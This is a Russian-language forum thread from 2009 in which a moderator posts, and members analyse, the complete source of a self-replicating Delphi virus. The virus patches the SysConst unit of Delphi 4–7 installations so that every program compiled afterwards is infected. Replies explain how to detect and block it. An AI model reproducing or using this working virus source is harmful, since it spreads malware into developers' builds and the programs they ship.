Последние файлы
Наши партнеры
Важная информация
Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi)
Infinity Box - Официальный русскоязычный форум поддержки продукта Infinity Box
Официальный сайт продукта www.infinity-box.com
Обновления Infinity Box
Обновления BEST
Обновления ChineseMiracle
Обновления ChineseMiracle-2
Обновления MT62xx CPU Russian Language Pack Editor
Закрытая тема
 
Опции темы
  • Новое
    Аватар для IHelper

    IHelper
    Супер Модератор

    Сообщений:
    1,857
    Регистрация:
    05.05.2006
    Рейтинг мнений: 1766
    Вес репутации: 467
    IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
    Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100
    Активность: 99% Активность: 99% Активность: 99%
    По умолчанию Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #1
    Уважаемые пользователи и программеры,

    Скажу сразу: всё нижесказанное может повлиять только на тех, кто программит на Delphi. Для тех, у кого Delphi на компе не установлен весь текст ниже не имеет никакого смысла.

    Воизбежание дальнейших недоразумений и для предотвращения попыток недобросовестных конкурентов обвинить нас во всех тягчайших грехах какие только может придумать нездоровый мозг постараюсь прояснить имевшую место быть ситуацию.

    В недавнем прошлом имела ситуация, описанная тов. Лазером тут:
    http://forum.gsmhosting.com/vbb/show...96#post4590996

    Безусловный респект тов. Лазеру за мониторинг всех последних версий Infinity-Box софта и за публично выданное предупреждение (хотя, конечно, такого рода предупреждения всяко проще давать в приватной беседе, тем более, что связаться со мной тов. Лазеру проще простого и я всегда буду рад пообщаться на различные темы).

    Как выяснилось, имевшая место ситуация дала нездоровый повод для нездоровой дискуссии на нездоровом ресурсе (и лично я не удивлен, что именно там такая вот дискуссия возникла):
    http://z3x-team.com/forum/topic.php?post=4149#post4149

    Выражаю большую признательность френдам, давшим мне линк нездорового ресурса, который показывает, на что готовы идти люди в попытках очернить репутацию добропорядочных людей. Этот пример объективно показывает степень испорченности мозга тех, кто пользуется такого рода ситуациями для выражения своей истинной природы, как, впрочем, и полное отсутствие каких-либо навыков в чтениии элементарного исходного кода (тот, кто разберет приложенный исходный код и сравнит свои мысли с выводами, озвученными нездоровыми ртами сам увидит нулевую степень нездорового мозга).

    Ниже приводится исходный текст, который каждый может проанализировать и увидеть, что именно зловредного он несет.
    Специально не хочу давать тут каких-либо заключений по причине того, что лучше пусть кто-нибудь другой напишет резюме того, что именно данный код может и чего не может сделать, и сможет ли он сделать то, в чем пытаются обвинить нас нездоровые злобные карлики.

    Я буду признателен всем, кто самостоятельно разберет код из аттача тов. Лазера.
    Если кому будет удобнее разобрать код, который приведен в более читаемый вид, то привожу его тут.

    Код:
    uses windows;
    
    var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
    'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
    '=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
    'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
    'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
    '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
    '(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
    'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
    'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
    ',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
    'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
    ')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
    'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
    'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
    'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
    '0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
    'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
    '@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
    'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
    'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
    'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
    '1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
    '$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
    'begin st; end.');
    
    function x(s:string):string;
    var i:integer;
    begin 
      for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39;
      result:=s;
    end;
    
    procedure re(s,d,e:string);
    var f1,f2:textfile;
        h:cardinal;
        f:STARTUPINFO;
        p:PROCESS_INFORMATION;
        b:boolean;
        t1,t2,t3:FILETIME;
    begin
      h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
      if h<>DWORD(-1) then
      begin
        CloseHandle(h);
        exit;
      end;
      {'I-}assignfile(f1,s);
      reset(f1);
      if ioresult<>0 then exit;
      assignfile(f2,d+'pas');
      rewrite(f2);
      if ioresult<>0 then begin closefile(f1); exit; end;
    
      while not eof(f1) do
      begin
        readln(f1,s);
        writeln(f2,s);
        if pos('implementation',s)<>0 then break;
      end;
    
      for h:= 1 to 1 do writeln(f2,sc[h]);
      for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');');
      for h:= 2 to 24 do writeln(f2,x(sc[h]));
      closefile(f1);
      closefile(f2);
      {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
      fillchar(f,sizeof(f),0);
      f.cb := sizeof(f);
      f.dwFlags := STARTF_USESHOWWINDOW;
      f.wShowWindow := SW_HIDE;
      b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
      if b then WaitForSingleObject(p.hProcess,INFINITE);
      MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
      DeleteFile(pchar(d+'pas'));
      h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
      if  h=DWORD(-1) then exit;
      GetFileTime(h,@t1,@t2,@t3);
      CloseHandle(h);
      h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
      if h=DWORD(-1) then exit;
      SetFileTime(h,@t1,@t2,@t3);
      CloseHandle(h);
    end;
    
    procedure st;
      var  k:HKEY;c:array [1..255] of char;
      i:cardinal;
      r:string;
      v:char;
    begin
      for v:='4' to '7' do
        if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
        begin
          i:=255;
          if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
          begin
            r:='';
            i:=1;
            while c[i]<>#0 do
            begin
              r:=r+c[i];
              inc(i);
            end;
            re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
          end;
        RegCloseKey(k);
      end;
    end;
    
    begin
      st;
    end.
    p.s.
    Чтобы такого не происходило в будущем ни с кем, будьте оченнь внимательны и осторожны при запуске каких-либо чужих приложений на своём ПК. Даже очень умные антивирусы не могут знать всего и могут пропустить что-то с виду очень простое.

    p.p.s.
    Для тех, кто хочет заработать себе плюсики поливанием грязью других: чтобы не показывать свою полную необразованность в следующий раз постарайтесь сначала подумать, и только потом уже пороть чушь про злой умысел уважаемых людей, которые подняли такой проект как Infinity-Box и держат её на высоте более 4 (четырех) лет. Как показывает практика, такого рода работа под силу только профессионалам высочайшей квалификации и безграничной работоспособности.

    p.p.p.s.
    Если кому-то еще по нездоровости придут в головы мысли типа "они воруют исходники", то рекомендую всем посмотреть всем мультфильм "Летучий корабль", там есть радикальный ответ на все вопросы, которые я могу себе задать по поводу каких-либо исходников. Ответ на вопрос где я беру то, что сам не могу сделать составляет всего одно слово и звучит сразу после вопроса Царя "Построишь летучий корабль ?".

    @NoName®
    С остальными-то всё понятно уже давно. Я последнее время думал, что у тебя интеллекта больше чем у прочих, а ты себя поставил в один ряд.
    Неужели ты сам не был столь любопытен и не посмотрел, что именно за код был в аттаче ?
    Если стал писать не посмотрев, то надо списать это на обычное стадное чувство, а если посмотрел и всёравно стал писать, то либо твоя программерская квалификация стремится к нулю либо я просто промолчу дальше, а остальные пусть догадаются сами.

    @Sedy
    Спросил бы у меня, я бы рассказал больше, понятнее и более квалифицированно.

    Последний раз редактировалось IHelper; 06.07.2009 в 00:41.
    06.07.2009, 00:13
  • Новое
    Аватар для Viktor001

    Viktor001
    Сенсей

    Сообщений:
    1,761
    Регистрация:
    19.10.2005
    Возраст:
    56
    Рейтинг мнений: 1340
    Вес репутации: 361
    Viktor001 отключил(а) отображение уровня репутации
    Очки: 21,438, Уровень: 92 Очки: 21,438, Уровень: 92 Очки: 21,438, Уровень: 92
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #2
    Цитата:
    Сообщение от IHelper Посмотреть сообщение
    Безусловный респект тов. Лазеру за мониторинг всех последних версий Infinity-Box софта и за публично выданное предупреждение
    the_laser делал это не ради любопытства, а потому что появились жалобы об ошибках, при запуске Setool. Вот эта тема на МФ: http://www.mobile-files.ru/forum/sho...d.php?t=220294
    06.07.2009, 00:37
    Пользователь добавил плюс
  • Новое
    Аватар для IHelper

    IHelper
    Супер Модератор

    Сообщений:
    1,857
    Регистрация:
    05.05.2006
    Рейтинг мнений: 1766
    Вес репутации: 467
    IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
    Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100
    Активность: 99% Активность: 99% Активность: 99%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #3
    Цитата:
    Сообщение от Viktor001 Посмотреть сообщение
    the_laser делал это не ради любопытства, а потому что появились жалобы об ошибках, при запуске Setool. Вот эта тема на МФ: http://www.mobile-files.ru/forum/sho...d.php?t=220294
    Я не испытываю иллюзий по поводу того, что ему больше нечего делать, только постоянно мониторить чем я занимаюсь. Лично я знаю одно - я этого кода себе сам не добавлял, а добавлял кто-то из тех, программы кого я запускал у себя на компе без всякой опаски.
    06.07.2009, 00:49
  • Новое
    Аватар для PANUA

    PANUA
    Сенсей

    Сообщений:
    2,142
    Регистрация:
    19.11.2005
    Возраст:
    53
    Рейтинг мнений: 2264
    Вес репутации: 583
    PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA PANUA
    Очки: 54,799, Уровень: 100 Очки: 54,799, Уровень: 100 Очки: 54,799, Уровень: 100
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #4
    IHelper, Да на Дельфях программирует куча народу, отискать концы откуда взялся этот код - занятие практически нереальное, слишком много времени прошло У меня тоже сидела эта штука, и у Жеки, источником мог быть кто угодно, завтра проверю свой второй комп на наличии этого вируса, на нем я не пишу уже более 4-х месяцев.
    __________________
    При установке Linux не погибло ни одного пингвина,полегли только дятлы..
    06.07.2009, 01:11
  • Новое
    Аватар для IHelper

    IHelper
    Супер Модератор

    Сообщений:
    1,857
    Регистрация:
    05.05.2006
    Рейтинг мнений: 1766
    Вес репутации: 467
    IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
    Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100
    Активность: 99% Активность: 99% Активность: 99%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #5
    Цитата:
    Сообщение от PANUA Посмотреть сообщение
    IHelper, Да на Дельфях программирует куча народу, отискать концы откуда взялся этот код - занятие практически нереальное, слишком много времени прошло У меня тоже сидела эта штука, и у Жеки, источником мог быть кто угодно, завтра проверю свой второй комп на наличии этого вируса, на нем я не пишу уже более 4-х месяцев.
    Смысла искать концы не вижу т.к. ясно, что сделал это либо кто-то совсем неизвестный либо кто-то очень далекий от тех, кто тут на форуме общается.
    Цель поста только одна - чтобы кто-нибудь (не я) описал что именно данный код делает, чтобы ни у кого не возникало в будущем желания делать умный вид и пороть чушь про "специально сделанные вирусы" и т.д.

    Последний раз редактировалось IHelper; 06.07.2009 в 02:09.
    06.07.2009, 02:07
  • Новое
    Аватар для ravt

    ravt
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    1,389
    Регистрация:
    16.02.2007
    Возраст:
    41
    Рейтинг мнений: 1971
    Вес репутации: 342
    ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt
    Очки: 19,258, Уровень: 87 Очки: 19,258, Уровень: 87 Очки: 19,258, Уровень: 87
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #6
    Цитата:
    Сообщение от IHelper Посмотреть сообщение
    Цель поста только одна - чтобы кто-нибудь (не я) описал что именно данный код делает,
    Простым языком:
    Данный код ищет установленна ли в системе Delphi от 4 до 7 версии.
    Если он находит Delphi, он создает копию Sysconst.dcu в виде sysconst.Bak , и патчит sysconst.dcu добавляя себя.
    В итоге любая программа написанная на "заражонной" машине, будет иметь уже этот код.

    Проверить загаженная машина или нет, проще всего посмотрев есть ли в папке Delphi\lib файл sysconst.Bak
    Избавится тоже просто, создаем обычный файл sysconst.Bak, и тогда даже если запустить "заражонную" программу то патчить sysconst.dcu не будет.

    Больше злых деяний я не обнаружил, но я и не являюсь экспертом в данном вопросе, я только учусь.
    06.07.2009, 02:24
    4 пользователя(ей) добавили плюсы
    BelMobi (06.07.2009), Habib (06.07.2009), NoName® (07.07.2009), Slon (08.07.2009)
  • Новое
    Аватар для tevel

    tevel
    Сенсей

    Сообщений:
    781
    Регистрация:
    26.07.2005
    Возраст:
    44
    Рейтинг мнений: 908
    Вес репутации: 295
    tevel tevel tevel tevel tevel tevel tevel tevel tevel tevel tevel
    Очки: 19,349, Уровень: 87 Очки: 19,349, Уровень: 87 Очки: 19,349, Уровень: 87
    Активность: 10% Активность: 10% Активность: 10%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #7
    именно так. похоже просто на болванку
    06.07.2009, 09:50
  • Новое
    Аватар для uo5oq

    uo5oq
    MCRF Инженер

    Сообщений:
    4,787
    Регистрация:
    21.07.2005
    Рейтинг мнений: 3430
    Вес репутации: 1348
    uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
    Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100
    Активность: 41% Активность: 41% Активность: 41%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #8
    Рома, а какую цель мог преследовать написавший этот вирус?
    Цитата:
    Сообщение от ravt Посмотреть сообщение
    В итоге любая программа написанная на "заражонной" машине, будет иметь уже этот код.
    06.07.2009, 13:21
  • Новое
    Аватар для ravt

    ravt
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    1,389
    Регистрация:
    16.02.2007
    Возраст:
    41
    Рейтинг мнений: 1971
    Вес репутации: 342
    ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt
    Очки: 19,258, Уровень: 87 Очки: 19,258, Уровень: 87 Очки: 19,258, Уровень: 87
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #9
    Кроме самоутверждения, больше ни какой.
    Показать что вот я могу, и антивирус пропускает и сам себя копирует...
    Ну красть сырцы однозначно этот код не сможет
    Хотя код интересный, и в умелых руках может беды наделать.
    06.07.2009, 13:27
    Пользователь добавил плюс
    NoName® (07.07.2009)
  • Новое
    Аватар для uo5oq

    uo5oq
    MCRF Инженер

    Сообщений:
    4,787
    Регистрация:
    21.07.2005
    Рейтинг мнений: 3430
    Вес репутации: 1348
    uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
    Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100
    Активность: 41% Активность: 41% Активность: 41%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #10
    Цитата:
    Сообщение от ravt Посмотреть сообщение
    Кроме самоутверждения, больше ни какой.
    Не совсем так.
    Почитал, что Серега написал на хостинге, так это по сути - плацдарм для дальнейшего внедрения любого своего кода, например для плагиата.

    И тогда по поводу авторства, предположеного IHelper-ом, не остаётся сомнений

    Последний раз редактировалось s.Mobi; 06.07.2009 в 14:47.
    06.07.2009, 14:20
    Пользователь добавил минус
    NoName® (07.07.2009)
  • Новое
    Аватар для IHelper

    IHelper
    Супер Модератор

    Сообщений:
    1,857
    Регистрация:
    05.05.2006
    Рейтинг мнений: 1766
    Вес репутации: 467
    IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
    Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100
    Активность: 99% Активность: 99% Активность: 99%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #11
    Цитата:
    Сообщение от uo5oq Посмотреть сообщение
    Почитал, что Серега написал на хостинге, так это по сути - плацдарм для дальнейшего внедрения любого своего кода, например для плагиата.
    Лично я не вижу тут плацдарма после того, как тов. Лазер опубликовал код. Кроме как удовлетворения чьих-то амбиций (что у него само собой длиннее, чем у Касперского) тут больше ничего нет.

    Цитата:
    Сообщение от uo5oq Посмотреть сообщение
    И тогда по поводу авторства, предположеного IHelper-ом, не остаётся сомнений
    Я не предполагал никакого авторства, понять кто это сделал у меня фантазии не хватит, т.к. нахвататься такого "подарка" мог кто угодно где угодно.
    06.07.2009, 17:48
    Пользователь добавил плюс
    NoName® (07.07.2009)
  • Новое
    Аватар для uo5oq

    uo5oq
    MCRF Инженер

    Сообщений:
    4,787
    Регистрация:
    21.07.2005
    Рейтинг мнений: 3430
    Вес репутации: 1348
    uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
    Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100
    Активность: 41% Активность: 41% Активность: 41%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #12
    Цитата:
    Сообщение от IHelper Посмотреть сообщение
    Лично я не вижу тут плацдарма после того, как тов. Лазер опубликовал код.
    Мог и не публиковать.
    Цитата:
    Сообщение от IHelper Посмотреть сообщение
    Кроме как удовлетворения чьих-то амбиций (что у него само собой длиннее, чем у Касперского) тут больше ничего нет..
    Амбиции, совершенно у всех ex: советских и соц. лагерных программеров завышеные. Это нестрашно, и обычно с возрастом проходит.
    Цитата:
    Сообщение от IHelper Посмотреть сообщение
    Я не предполагал никакого авторства...
    Возможно мне показалось.
    06.07.2009, 18:29
  • Новое
    Аватар для IHelper

    IHelper
    Супер Модератор

    Сообщений:
    1,857
    Регистрация:
    05.05.2006
    Рейтинг мнений: 1766
    Вес репутации: 467
    IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper IHelper
    Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100 Очки: 49,803, Уровень: 100
    Активность: 99% Активность: 99% Активность: 99%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #13
    Цитата:
    Сообщение от uo5oq Посмотреть сообщение
    Мог и не публиковать.
    Мог

    Цитата:
    Сообщение от uo5oq Посмотреть сообщение
    Амбиции, совершенно у всех ex: советских и соц. лагерных программеров завышеные. Это нестрашно, и обычно с возрастом проходит.
    Скорее не у всех и не с возрастом, а у тех, которые не могут превратить свою "умность-амбициозность" в более полезные вещи (например типа денег).
    06.07.2009, 18:40
  • Новое
    Аватар для uo5oq

    uo5oq
    MCRF Инженер

    Сообщений:
    4,787
    Регистрация:
    21.07.2005
    Рейтинг мнений: 3430
    Вес репутации: 1348
    uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
    Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100
    Активность: 41% Активность: 41% Активность: 41%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #14

    ОФФтопик:
    Цитата:
    Сообщение от IHelper Посмотреть сообщение
    Скорее не у всех и не с возрастом, а у тех, которые не могут превратить свою "умность-амбициозность" в более полезные вещи (например типа денег).
    Согласен.
    От безисходности они переключаются на банальный плагиат, что позволяет им демпинговать и слегка мешать зарабатывать нормальным людям

    06.07.2009, 18:48
    Пользователь добавил минус
    NoName® (08.07.2009)
  • Новое
    Аватар для pasha_zv

    pasha_zv
    Забанен

    Сообщений:
    408
    Регистрация:
    04.10.2005
    Возраст:
    52
    Рейтинг мнений: 510
    Вес репутации: 0
    pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv pasha_zv
    Очки: 16,819, Уровень: 82 Очки: 16,819, Уровень: 82 Очки: 16,819, Уровень: 82
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #15
    Цитата:
    Сообщение от ravt Посмотреть сообщение
    Кроме самоутверждения, больше ни какой.
    Показать что вот я могу, и антивирус пропускает и сам себя копирует...
    Ну красть сырцы однозначно этот код не сможет
    Хотя код интересный, и в умелых руках может беды наделать.
    ничего, кодик прикольный, счас у себя на дельфи крутанул

    но насчет сырцов - увольте
    ИБО- все нормальные программеры после завершения работы
    экзешник пакуют, хоть EXEPack - ом
    по причине экономии места у пользователя,
    а также по некоторым другим соображениям ))
    причем некоторые даже используют самостоятельно разработанные упаковщики
    ... со встроенный алгоритмом антиотладки, например обрывания или использования INT1, INT3,
    или хранения в таймере некоторых параметров ))

    Последний раз редактировалось pasha_zv; 07.07.2009 в 13:30.
    07.07.2009, 13:29
  • Новое
    Аватар для FractalizeR

    FractalizeR
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    432
    Регистрация:
    20.06.2006
    Возраст:
    42
    Рейтинг мнений: 1026
    Вес репутации: 266
    FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR FractalizeR
    Очки: 10,494, Уровень: 68 Очки: 10,494, Уровень: 68 Очки: 10,494, Уровень: 68
    Активность: 1% Активность: 1% Активность: 1%
    Exclamation Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #16
    Цитата:
    Сообщение от uo5oq Посмотреть сообщение
    Рома, а какую цель мог преследовать написавший этот вирус?
    Можно предположить, что это тест нового способа распространения своего вируса. На этот раз через программистов, а не через пользователей. Кроме того, насколько я знаю, современные антивирусы не детектируют вирусы по их исходному коду на Дельфи. Поэтому фактически получилась гремучая смесь. Помните "Крепкий орешек"? Две безобидные разноцветные жидкости спокойно так себе лежат друг рядом с другом... Но стоит их соединить, как... БУМ! Так и тут. Исходник вируса никому не опасен и никаких деструктивных действий не производит. Однако стоит его соединить с Дельфи (скомпилировать на зараженной машине любую программу, даже "Hello World") как... БУМ! Мы получаем работоспособный вирус внедренный во вполне себе такую легальную программу. Идея недурна... Особенно учитывая, что разработчики имеют тенденцию скомпилированные программы потом размещать на своих сайтах или давать другим разработчикам.... Сами понимаете...
    07.07.2009, 16:25
    Пользователь добавил плюс
    NoName® (07.07.2009)
  • Новое
    Аватар для uo5oq

    uo5oq
    MCRF Инженер

    Сообщений:
    4,787
    Регистрация:
    21.07.2005
    Рейтинг мнений: 3430
    Вес репутации: 1348
    uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq uo5oq
    Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100 Очки: 173,491, Уровень: 100
    Активность: 41% Активность: 41% Активность: 41%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #17
    Цитата:
    Сообщение от FractalizeR Посмотреть сообщение
    Можно предположить, что это тест нового способа распространения своего вируса.
    Я именно так и предположил http://www.mcrf.ru/forum/showpost.ph...9&postcount=10

    P.S. На воре и шапка горит (старинная Русская пословица).
    07.07.2009, 17:55
    Пользователь добавил минус
    NoName® (08.07.2009)
  • Новое
    Аватар для slav-on

    slav-on
    MCRF Инженер

    Сообщений:
    1,254
    Регистрация:
    02.05.2005
    Возраст:
    49
    Рейтинг мнений: 472
    Вес репутации: 349
    slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on slav-on
    Очки: 35,805, Уровень: 100 Очки: 35,805, Уровень: 100 Очки: 35,805, Уровень: 100
    Активность: 10% Активность: 10% Активность: 10%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #18
    Будет гораздо хуже, если это проникнет в другие языки на которых пробуют писать студенты и программисты-самоучки
    Как сказал FractalizeR сырой код не отслеживают (яркий пример -наличие вирусов в линаксе)
    07.07.2009, 20:06
  • Новое
    Аватар для ravt

    ravt
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    1,389
    Регистрация:
    16.02.2007
    Возраст:
    41
    Рейтинг мнений: 1971
    Вес репутации: 342
    ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt ravt
    Очки: 19,258, Уровень: 87 Очки: 19,258, Уровень: 87 Очки: 19,258, Уровень: 87
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #19
    Ну начнем стого что Delphi, довльно мощный язык, и пишут на нем многие я даже думаю больше чем на С.
    Да и в мире GSM продуктов преаблодает именно этот язык, вот софт котрый написан на Delphi:
    UFS
    Infinity
    LangPackEditor от sMobi.
    SeTool
    SMTi
    Vigys
    Весь Z3х
    USB-Smart
    UBL
    Rocker
    JAF
    Cinek
    MultiBox
    ContentExtractor от PANUA
    и многие проэкты от неизвестных команд.
    Обусловленно это простым синтаксисом, при довльно мощных возможностях.
    07.07.2009, 20:53
    Пользователь добавил плюс
    NoName® (08.07.2009)
  • Новое
    Аватар для NoName®

    NoName®
    Разработчик продукта

    Сообщений:
    949
    Регистрация:
    17.05.2006
    Возраст:
    40
    Рейтинг мнений: 1285
    Вес репутации: 363
    NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName®
    Очки: 30,958, Уровень: 100 Очки: 30,958, Уровень: 100 Очки: 30,958, Уровень: 100
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Касательно так называемых "вирусов" (читать только тем, кто пользуется Delphi) #20
    Цитата:
    Сообщение от ravt Посмотреть сообщение
    на Delphi:
    JAF
    MultiBox
    JAF Кажется весь на MSVC писан
    MultiBox Смесь Delphi/CBuilder , но это не столь важно. А вот если конкретно искать откуда пошёл сорс вирус достаточно собрать
    по нескольео релизов от всех комманд и посмотреть где он вирь явился первее.



    Цитата:
    Сообщение от uo5oq Посмотреть сообщение
    Я именно так и предположил http://www.mcrf.ru/forum/showpost.ph...9&postcount=10

    P.S. На воре и шапка горит (старинная Русская пословица).
    Доказательства в студию Павел
    __________________

    Последний раз редактировалось NoName®; 07.07.2009 в 22:01.
    07.07.2009, 21:55
Закрытая тема


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Cмеемса =)) (рассказы) PGP ** OFFTOPIC ** 40 12.02.2006 21:49


Текущее время: 16:36. Часовой пояс GMT +3.